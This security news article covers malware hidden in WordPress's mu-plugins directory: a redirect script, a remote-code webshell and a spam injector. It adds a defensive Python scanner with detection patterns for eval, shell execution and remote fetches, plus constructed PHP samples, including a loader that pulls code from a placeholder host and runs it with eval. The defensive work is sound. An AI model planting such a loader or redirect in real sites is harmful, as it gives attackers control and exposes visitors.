
Threat Actors Hide Malware in WordPress Sites to Execute Remote Code


Security researchers have uncovered a sophisticated malware campaign targeting WordPress websites by exploiting the Must-Use Plugins (mu-plugins) directory.

This directory, which WordPress loads automatically on every request without any activation step (and with no way to deactivate its contents from the dashboard), has become a prime target for attackers because of its obscurity and its limited visibility in the standard WordPress plugin interface.

Malware Variants and Techniques

Three distinct malware variants have been identified within the mu-plugins directory, each employing unique techniques to compromise websites:

  1. Fake Update Redirect Malware: Found in wp-content/mu-plugins/redirect.php, this malware redirects site visitors to malicious external websites. It selectively targets ordinary visitors while skipping bots and privileged (logged-in) users, so the site keeps looking clean to the people most likely to notice, which helps it persist.
  2. Webshell for Remote Code Execution: Disguised as a legitimate plugin in wp-content/mu-plugins/index.php, this script lets attackers execute arbitrary code on the server. Because it fetches and runs external PHP scripts at request time, attackers can deploy new malware without ever modifying the file on disk again.
  3. Spam Injector: A script located in wp-content/mu-plugins/custom-js-loader.php injects spam content and manipulates page elements. It replaces images with explicit content and hijacks outbound links, redirecting users to malicious sites.

Administrators can detect these infections through several signs, such as unauthorized redirections, unusual server resource usage, unexpected file modifications, or the presence of suspicious files in the mu-plugins directory.

According to the report, these files often mimic legitimate plugins, making them harder to identify during routine checks.

Impact on Websites

The consequences of these infections are severe:

  • Redirect Malware: Exposes users to harmful content, damages website reputation, and reduces traffic.
  • Webshell: Grants attackers full control over the site, enabling data theft, malware distribution, and persistent backdoors.
  • Spam Injector: Tarnishes the site’s reputation by displaying explicit content and redirecting users to spam or malicious websites.

[Figure: Remote Code Execution Webshell]

These attacks highlight the financial motives of threat actors, who leverage compromised sites for SEO manipulation, data theft, and monetization through malicious advertisements.

The malware likely infiltrates sites through outdated plugins or themes, compromised admin credentials, or poorly secured hosting environments.

Once installed in the mu-plugins directory, it ensures automatic execution with WordPress, complicating detection and removal.

To mitigate risks:

  • Regularly scan for malicious files in critical directories.
  • Update WordPress core, plugins, and themes.
  • Enable two-factor authentication (2FA) for admin accounts.
  • Use security plugins to monitor file integrity and detect unauthorized changes.
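The detection signs listed earlier (unexpected file modifications, suspicious files in mu-plugins) and the last two mitigation points (file integrity monitoring, scanning critical directories) can be exercised with a small script. The following is an added example written for this article, not code from the report or from any WordPress plugin. It builds a SHA-256 baseline of wp-content/mu-plugins, reports files added, modified or removed since the baseline, and runs a heuristic content scan for constructs typical of PHP backdoors and redirect scripts. The indicator list, the sample plugin and the two constructed "dropped" files in demo() are assumptions made for illustration; the hostname example.invalid is a reserved placeholder and nothing is fetched.

```python
import hashlib
import os
import re
import tempfile

# Heuristic indicators often found in PHP webshells and redirect malware.
# Constructed for this example; tune the list to your environment.
INDICATORS = {
    "dynamic_eval": re.compile(r"\b(eval|assert|create_function)\s*\(", re.I),
    "obfuscation": re.compile(r"\b(base64_decode|gzinflate|str_rot13|gzuncompress)\s*\(", re.I),
    "remote_fetch": re.compile(r"\b(file_get_contents|curl_init|fopen)\s*\(\s*['\"]https?://", re.I),
    "redirect": re.compile(r"header\s*\(\s*['\"]Location:", re.I),
    "raw_exec": re.compile(r"\b(shell_exec|system|passthru|exec|popen)\s*\(", re.I),
    "user_agent_check": re.compile(r"HTTP_USER_AGENT", re.I),
}


def sha256_file(path):
    """Stream a file through SHA-256 and return the hex digest."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(mu_dir):
    """Return {relative_path: sha256} for every file under mu_dir."""
    baseline = {}
    for root, _, files in os.walk(mu_dir):
        for name in files:
            full = os.path.join(root, name)
            baseline[os.path.relpath(full, mu_dir)] = sha256_file(full)
    return baseline


def check_integrity(mu_dir, baseline):
    """Compare the directory with a stored baseline; report added/modified/removed."""
    current = build_baseline(mu_dir)
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in current if p in baseline and current[p] != baseline[p])
    return {"added": added, "modified": modified, "removed": removed}


def scan_for_indicators(mu_dir):
    """Return {relative_path: [indicator names]} for PHP files matching any indicator."""
    findings = {}
    for root, _, files in os.walk(mu_dir):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            full = os.path.join(root, name)
            with open(full, "r", encoding="utf-8", errors="replace") as f:
                body = f.read()
            hits = [key for key, rx in INDICATORS.items() if rx.search(body)]
            if hits:
                findings[os.path.relpath(full, mu_dir)] = hits
    return findings


def demo():
    """Build a constructed mu-plugins directory, baseline it, then simulate a compromise."""
    tmp = tempfile.mkdtemp()
    mu = os.path.join(tmp, "wp-content", "mu-plugins")
    os.makedirs(mu)
    # Benign, constructed plugin present when the baseline is taken.
    with open(os.path.join(mu, "site-tweaks.php"), "w") as f:
        f.write("<?php\n/* Plugin Name: Site Tweaks */\n"
                "add_filter('show_admin_bar', '__return_false');\n")
    baseline = build_baseline(mu)
    # Constructed samples mirroring the two behaviours described in the article:
    # a loader that fetches and evaluates remote PHP, and a visitor-only redirect.
    with open(os.path.join(mu, "index.php"), "w") as f:
        f.write("<?php\n$c = file_get_contents('https://example.invalid/p.txt');\neval($c);\n")
    with open(os.path.join(mu, "redirect.php"), "w") as f:
        f.write("<?php\nif (!preg_match('/bot/i', $_SERVER['HTTP_USER_AGENT'])) {\n"
                "  header('Location: https://example.invalid/update');\n}\n")
    return check_integrity(mu, baseline), scan_for_indicators(mu)


if __name__ == "__main__":
    diff, findings = demo()
    print("integrity:", diff)
    print("indicators:", findings)
```

In practice, store the baseline outside the web root (or in version control), regenerate it only after a deliberate deployment, and run check_integrity from cron so that any new or changed file in mu-plugins raises an alert; the indicator scan is a triage aid, since legitimate plugins can also use these functions and obfuscated samples may evade simple patterns.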

The exploitation of the mu-plugins directory underscores the evolving tactics of cybercriminals targeting WordPress platforms.

Proactive security measures such as regular monitoring and robust access controls are essential to safeguarding websites against these persistent threats.

